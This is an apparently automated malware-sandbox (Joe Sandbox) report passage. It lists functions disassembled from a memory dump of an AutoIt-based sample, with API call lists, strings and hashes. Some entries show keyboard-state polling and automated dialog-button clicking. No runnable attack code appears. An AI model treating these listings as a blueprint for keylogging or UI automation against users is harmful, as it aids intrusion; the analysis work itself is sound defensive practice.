                                                    • Opcode Fuzzy Hash: e4a6c48e42bb394fa03151b2f0598c2fc79963912c00a02a8c373d3891c5bccd
                                                    • Instruction Fuzzy Hash: 5C118271950229B9DB20A7A1DC5ADFF7B7CFB92F51F400429B801A20D2DEA49908E5A1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 208665112-3771769585
                                                    • Opcode ID: a9f99feacc026ca5477f50851ca969e622385d06a21070692349a9b88475977e
                                                    • Instruction ID: 9963faa6ea9574909da14bb9472da6b903c3851ad6e3c059866809d812868e78
                                                    • Opcode Fuzzy Hash: a9f99feacc026ca5477f50851ca969e622385d06a21070692349a9b88475977e
                                                    • Instruction Fuzzy Hash: 04113A32904108ABCB51A7609C4EEEE77BCDF81721F0401A5F50492091EF74A9C9FB50
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00F55535
                                                      • Part of subcall function 00F1083E: timeGetTime.WINMM(?,00000002,00EFC22C), ref: 00F10842
                                                    • Sleep.KERNEL32(0000000A), ref: 00F55561
                                                    • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00F55585
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F555A7
                                                    • SetActiveWindow.USER32 ref: 00F555C6
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F555D4
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F555F3
                                                    • Sleep.KERNEL32(000000FA), ref: 00F555FE
                                                    • IsWindow.USER32 ref: 00F5560A
                                                    • EndDialog.USER32(00000000), ref: 00F5561B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: cd843e56dd481407013fe5f346ea5567a8a4f058502f1dd3209cc671a2536c92
                                                    • Instruction ID: 543cb55f09b1c2a8b836419898051c744bd44fc2463658bda35a2e4551477bef
                                                    • Opcode Fuzzy Hash: cd843e56dd481407013fe5f346ea5567a8a4f058502f1dd3209cc671a2536c92
                                                    • Instruction Fuzzy Hash: EC21D47020460CAFE7906B60ECD9B793B6EEB847A6F481114FA01811A1DF719C58FF72
                                                    APIs
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • CoInitialize.OLE32(00000000), ref: 00F5DC2D
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F5DCC0
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F5DCD4
                                                    • CoCreateInstance.OLE32(00F83D4C,00000000,00000001,00FAB86C,?), ref: 00F5DD20
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F5DD8F
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00F5DDE7
                                                    • _memset.LIBCMT ref: 00F5DE24
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F5DE60
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F5DE83
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00F5DE8A
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F5DEC1
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00F5DEC3
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 5171cf632b6ab084d315aeff34cc9a08d1bb7109e23197ad7b96dc3209c4b08e
                                                    • Instruction ID: ca3d2a3714144325015ac17c1c9419042b3c85bcc6212fda7b1e7a7a9948866a
                                                    • Opcode Fuzzy Hash: 5171cf632b6ab084d315aeff34cc9a08d1bb7109e23197ad7b96dc3209c4b08e
                                                    • Instruction Fuzzy Hash: E1B10975A00109AFDB14DFA4CC89DAEBBF9FF48315B108469E909EB261DB30EE45DB50
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00F50896
                                                    • SetKeyboardState.USER32(?), ref: 00F50901
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F50921
                                                    • GetKeyState.USER32(000000A0), ref: 00F50938
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F50967
                                                    • GetKeyState.USER32(000000A1), ref: 00F50978
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F509A4
                                                    • GetKeyState.USER32(00000011), ref: 00F509B2
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F509DB
                                                    • GetKeyState.USER32(00000012), ref: 00F509E9
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F50A12
                                                    • GetKeyState.USER32(0000005B), ref: 00F50A20
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 033f59deeedd1101de31364dbe7a735961b25ce16e8cb0951d85ff15f094d1db
                                                    • Instruction ID: 837e826ba970bec2aa6a46b4cae4f1c2d07db67e5e052f15e9b0a240e4582e07
                                                    • Opcode Fuzzy Hash: 033f59deeedd1101de31364dbe7a735961b25ce16e8cb0951d85ff15f094d1db
                                                    • Instruction Fuzzy Hash: 90518A30D0478829FB35DBB08815BEABFB49F01392F4845999EC2575C3DE64AA4CD7A1
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 00F4CE1C
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F4CE2E
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F4CE8C
                                                    • GetDlgItem.USER32(?,00000002), ref: 00F4CE97
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F4CEA9
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F4CEFD
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F4CF0B
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F4CF1C
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F4CF5F
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F4CF6D
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F4CF8A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4CF97
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: fe19fe624c219cc7d8c409ae51ed832ab9496ba246c9ba5de3ac597132fe9af6
                                                    • Instruction ID: d3a9f41786964314a999b5598cf3468c3bcc092bd15de8f82cf7920975c518e4
                                                    • Opcode Fuzzy Hash: fe19fe624c219cc7d8c409ae51ed832ab9496ba246c9ba5de3ac597132fe9af6
                                                    • Instruction Fuzzy Hash: AB514171B00209AFDF58CF69CD89ABEBBB6EB88710F54812DF915D7290DB70AD049B50
                                                    APIs
                                                      • Part of subcall function 00EF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EF2412,?,00000000,?,?,?,?,00EF1AA7,00000000,?), ref: 00EF1F76
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EF24AF
                                                    • KillTimer.USER32(-00000001,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00EF254A
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00F2BFE7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00F2C018
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00F2C02F
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EF1AA7,00000000,?,?,00EF1EBE,?,?), ref: 00F2C04B
                                                    • DeleteObject.GDI32(00000000), ref: 00F2C05D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: e559df7dfab7842f9be016662332c0cfe92d089578abf6c712a96402ed75a00a
                                                    • Instruction ID: 108cfec2f749c9338e84374bb8533c13758289c7473c5ff3a343a72bad9e13c0
                                                    • Opcode Fuzzy Hash: e559df7dfab7842f9be016662332c0cfe92d089578abf6c712a96402ed75a00a
                                                    • Instruction Fuzzy Hash: 1A61BE30504718DFCB25EF14D988B7A77F1FF84326F60961CE256A69A0C7B0A880EF91
                                                    APIs
                                                      • Part of subcall function 00EF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00EF29BC
                                                    • GetSysColor.USER32(0000000F), ref: 00EF25AF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: a4fd794d747833afa01e17d8837474b25e628f147f57265fb7a5e3c6a9d79f99
                                                    • Instruction ID: c1a0c354993e5c0e486ab90d1e5a263873445400afe0d7101df01e09fffcd4e6
                                                    • Opcode Fuzzy Hash: a4fd794d747833afa01e17d8837474b25e628f147f57265fb7a5e3c6a9d79f99
                                                    • Instruction Fuzzy Hash: 3E41C231004518EFDB209F289C88BF93B65EB4A335F5A4269FF659E1E1CB308C41EB61
                                                    APIs
                                                      • Part of subcall function 00F10B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F02A3E,?,00008000), ref: 00F10BA7
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F02ADF
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F02C2C
                                                      • Part of subcall function 00F03EBE: _wcscpy.LIBCMT ref: 00F03EF6
                                                      • Part of subcall function 00F1386D: _iswctype.LIBCMT ref: 00F13875
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 537147316-3738523708
                                                    • Opcode ID: b64780b9058420b1177f85f332bbe14d1bbadf12fea9d99fabb2bd27a79bf278
                                                    • Instruction ID: 1bdd68538e004d1b3f11e3d06ff9864c68f5dd378c3f07a44870a15754b166b3
                                                    • Opcode Fuzzy Hash: b64780b9058420b1177f85f332bbe14d1bbadf12fea9d99fabb2bd27a79bf278
                                                    • Instruction Fuzzy Hash: D802AE715083419FC764EF24C881AAFBBE5BF89324F10491DF989932A2DB34D949FB52
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00F80980), ref: 00F5AF4E
                                                    • GetDriveTypeW.KERNEL32(00000061,00FAB5F0,00000061), ref: 00F5B018
                                                    • _wcscpy.LIBCMT ref: 00F5B042
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: b87447993cd9082502d40352508c6f8315a6b860fc88df33f7211ff4235357fd
                                                    • Instruction ID: 2ae8cb740520b7e9819043abd6bbd7e48c7c16dd2f5e08631dfbf813efc47588
                                                    • Opcode Fuzzy Hash: b87447993cd9082502d40352508c6f8315a6b860fc88df33f7211ff4235357fd
                                                    • Instruction Fuzzy Hash: 7F51DC715083099FC310EF14CC91AABB7E5FF80311F504919FA96572E2EB70ED49EA82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    • Opcode ID: 1e3ba5b9a8a262c31060e29a316114755a955ccff38c937b593a27ae7b0bd920
                                                    • Instruction ID: 75de15009311b6a43da81f25cc8908c883b62f70fa334efd2f1715bcc7a3da79
                                                    • Opcode Fuzzy Hash: 1e3ba5b9a8a262c31060e29a316114755a955ccff38c937b593a27ae7b0bd920
                                                    • Instruction Fuzzy Hash: 2941E7B1A04209AFDB34DF74DC42EBA73E8EB45310F20445EE649D72D2EA76D942EB11
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F7778F
                                                    • CreateMenu.USER32 ref: 00F777AA
                                                    • SetMenu.USER32(?,00000000), ref: 00F777B9
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F77846
                                                    • IsMenu.USER32(?), ref: 00F7785C
                                                    • CreatePopupMenu.USER32 ref: 00F77866
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F77893
                                                    • DrawMenuBar.USER32 ref: 00F7789B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    • Opcode ID: 611807e69dabe7a3c49037687164f19799b3c52cf58053b41018f0ffb76cf9c7
                                                    • Instruction ID: fd47cc075e4215ce2bd8198c4a87ef4cbf27dc3874292cb3483e90a2eac88ed7
                                                    • Opcode Fuzzy Hash: 611807e69dabe7a3c49037687164f19799b3c52cf58053b41018f0ffb76cf9c7
                                                    • Instruction Fuzzy Hash: 8F414775A11309EFDB10EF64D888EAA7BB5FF49310F254129F909A7360C730A914EF61
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F77B83
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00F77B8A
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F77B9D
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F77BA5
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F77BB0
                                                    • DeleteDC.GDI32(00000000), ref: 00F77BB9
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F77BC3
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F77BD7
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F77BE3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 9cc92409872a383a7cdf8978cb60349f4c637074eb90eea9c5384e56f834c45c
                                                    • Instruction ID: c5f08027a468b9aa8c34f1109fe96169462181d0b0e25b8c27c9e7490a0e7b05
                                                    • Opcode Fuzzy Hash: 9cc92409872a383a7cdf8978cb60349f4c637074eb90eea9c5384e56f834c45c
                                                    • Instruction Fuzzy Hash: A8319E32104218AFDF11AF68CC49FEB3B69FF49320F104215FA19A61A0CB75D824EBA5
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F1706B
                                                      • Part of subcall function 00F18D58: __getptd_noexit.LIBCMT ref: 00F18D58
                                                    • __gmtime64_s.LIBCMT ref: 00F17104
                                                    • __gmtime64_s.LIBCMT ref: 00F1713A
                                                    • __gmtime64_s.LIBCMT ref: 00F17157
                                                    • __allrem.LIBCMT ref: 00F171AD
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F171C9
                                                    • __allrem.LIBCMT ref: 00F171E0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F171FE
                                                    • __allrem.LIBCMT ref: 00F17215
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F17233
                                                    • __invoke_watson.LIBCMT ref: 00F172A4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                    • Instruction ID: 9c5748fe5b65875a16a07474a737edcc19fcb7dc143cef6235a3974e445a19d1
                                                    • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                    • Instruction Fuzzy Hash: FD71F871E44717ABD714AE79DC41BDAB3B8AF14330F14422AF518E7281E774D981AF90
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F52CE9
                                                    • GetMenuItemInfoW.USER32(00FB7890,000000FF,00000000,00000030), ref: 00F52D4A
                                                    • SetMenuItemInfoW.USER32(00FB7890,00000004,00000000,00000030), ref: 00F52D80
                                                    • Sleep.KERNEL32(000001F4), ref: 00F52D92
                                                    • GetMenuItemCount.USER32(?), ref: 00F52DD6
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F52DF2
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00F52E1C
                                                    • GetMenuItemID.USER32(?,?), ref: 00F52E61
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F52EA7
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F52EBB
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F52EDC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
